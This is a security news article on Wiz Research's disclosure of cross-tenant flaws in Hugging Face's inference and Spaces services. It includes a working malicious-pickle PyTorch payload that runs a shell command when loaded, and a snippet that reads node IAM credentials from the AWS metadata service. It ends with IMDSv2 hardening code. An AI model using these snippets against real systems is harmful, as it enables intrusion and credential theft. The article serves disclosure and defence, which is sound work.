
AI-as-a-Service Provider Vulnerabilities Let Attackers Perform Cross-Tenant Attacks


The rapid adoption of AI raises serious security concerns and demands strict measures to protect sensitive information hosted on shared cloud AI infrastructure.

Wiz Research, a cybersecurity firm, working in collaboration with AI-as-a-Service providers, recently uncovered common security flaws across the sector that could expose users' private data and models.

These findings deserve serious attention, given that AI services are now present in more than 70% of cloud environments.


AI-as-a-Service Provider Vulnerabilities

Malicious models pose a severe threat, enabling cross-tenant attacks and access to millions of private AI models and apps hosted by AI-as-a-Service providers. Wiz uncovered critical risks in Hugging Face's environment:

  • Shared inference infrastructure takeover risk via untrusted pickle-serialized models with potential remote code execution payloads.
  • Shared CI/CD takeover risk through malicious AI applications compromising the pipeline for supply chain attacks.

Securing AI/ML systems requires accounting for several components: the AI model in use, the application code that consumes the model's output, and the inference infrastructure that deploys the model.

AI-as-a-Service provider vulnerabilities (Source: Wiz)

Attackers can target each of these components in different ways, including malicious input fed to models, insecure application code that processes model output, and pickled models that compromise the inference infrastructure.

Downloading an untrusted AI model is, in effect, equivalent to embedding untrusted code in an application.

The researchers focused on isolation flaws in Hugging Face's AI-as-a-service setup, examining the company's major products:

  • Inference API
  • Inference Endpoints
  • Spaces
Inference API (Source: Wiz)

However, Hugging Face’s analysis and warnings of insecure Pickle-based PyTorch models still allow inferring potentially malicious models. 

Building on this, the researchers crafted a malicious PyTorch model that runs arbitrary code when loaded and achieved remote code execution by interacting with it through the Inference API, as sketched below.
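
The following is a minimal, hypothetical sketch of this class of payload, not the researchers' actual code. It relies on the fact that PyTorch's default checkpoint format is pickle-based and that an object's `__reduce__` method can name an arbitrary callable to run during deserialization; the command and file names here are placeholders.

```python
import os
import torch

# Hypothetical proof of concept: any object whose __reduce__ returns a
# callable plus its arguments will have that callable invoked by the
# unpickler when the file is loaded.
class MaliciousPayload:
    def __reduce__(self):
        # Placeholder command; a real attacker could spawn a reverse shell
        # or exfiltrate data here instead.
        return (os.system, ("id > /tmp/pwned",))

# torch.save serializes the object with pickle, so the resulting file
# looks like an ordinary model checkpoint.
torch.save(MaliciousPayload(), "malicious_model.bin")

# Deserializing the file runs the embedded command. Older PyTorch releases
# unpickle unconditionally; newer ones require explicitly opting out of the
# weights_only safeguard, as shown here.
torch.load("malicious_model.bin", weights_only=False)  # executes the command
```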

The researchers achieved shell-like functionality by hooking into the code Hugging Face uses to manage inference results after deserialization.

This demonstrates the risk that untrusted AI models pose to shared compute services when tenant isolation is inadequate.

After gaining a reverse shell through the Hugging Face Inference API, the researchers found themselves inside a pod running in an Amazon EKS Kubernetes cluster.

They then exploited common misconfigurations, querying the node's instance metadata service (IMDS) to obtain the node's IAM role and the cluster name; a rough sketch of that reconnaissance step follows.
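
A rough, hypothetical sketch of that reconnaissance (assuming the pod can reach IMDSv1 at the standard link-local address without a session token) might look like the following; the metadata paths are standard AWS endpoints, and everything else is illustrative.

```python
import requests

# Hypothetical post-exploitation reconnaissance from inside a compromised
# pod, assuming IMDSv1 is reachable at the well-known link-local address.
IMDS = "http://169.254.169.254/latest"

# Name of the IAM role attached to the underlying EC2 node.
role = requests.get(
    f"{IMDS}/meta-data/iam/security-credentials/", timeout=2
).text.strip()

# Temporary AWS credentials for that node role; if the role is
# over-privileged, these enable lateral movement within the cluster.
creds = requests.get(
    f"{IMDS}/meta-data/iam/security-credentials/{role}", timeout=2
).json()

# On EKS nodes, the cluster name can often also be recovered from the
# instance user data exposed by the same metadata service.
print(role, creds["AccessKeyId"])
```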

With the node role's privileges, they were able to read pod information and secrets, highlighting the risks of lateral movement and data leakage.

The team also achieved code execution through a malicious Dockerfile in Hugging Face Spaces, demonstrating a potential supply chain attack vector caused by network isolation issues in the container registry.

The researchers urged providers to enforce IMDSv2 with a low hop limit, apply tighter access controls, and require authentication to secure shared AI environments; a minimal hardening sketch is shown below.
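
As an illustration only, here is a minimal sketch of the first recommendation using boto3, with a placeholder instance ID: requiring IMDSv2 session tokens and capping the metadata hop limit so responses cannot cross a container's network bridge.

```python
import boto3

ec2 = boto3.client("ec2")

# Placeholder instance ID; in practice this would be applied to every node
# (or baked into the launch template) of the shared inference cluster.
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",
    HttpEndpoint="enabled",
    HttpTokens="required",        # enforce IMDSv2 (session tokens)
    HttpPutResponseHopLimit=1,    # stop metadata replies at the node itself
)
```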
